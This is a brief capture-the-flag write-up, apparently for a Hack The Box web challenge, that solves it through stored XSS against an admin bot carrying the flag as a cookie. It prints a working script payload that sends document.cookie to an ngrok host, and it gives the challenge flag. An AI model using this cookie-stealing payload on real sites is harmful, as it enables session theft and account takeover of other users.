Rating: 3.0
According to index.js in challenges/routes, we can send a POST request to /api/submit with a query in the body.
I did so and got a message that it was successful.
The website looks like this:
Clicking on the back of the elves makes a window pop up where we can send the POST request mentioned in the source code:
The bot.js source code looks like this: it visits the queries page, where the message from our POST request is displayed, and it carries a cookie whose value is the flag itself.
We can't open the queries page ourselves because only localhost is allowed to.
I disabled that filter on my local instance so that I could see the output of our messages. I tried XSS and saw that it is triggered. Using the payload below, we were able to get our fake flag after setting up a Python HTTP server and ngrok. Basically, I was able to steal the cookie via XSS.
XSS cookie stealer payload:
```html
<script type="text/javascript">document.location="http://a417-2a02-2f0e-de00-fa00-b2bc-3b79-670f-3c60.ngrok.io/?c="+document.cookie;</script>
```
Re-ran the same syntax on the remote instance and got the legit flag. I didn't need to bypass the localhost filter at all.
![image](https://user-images.githubusercontent.com/80063008/144764957-5d3beb2f-2c47-4e15-a459-4b224b88204f.png)
HTB{3v1l_3lv3s_4r3_r1s1ng_up!}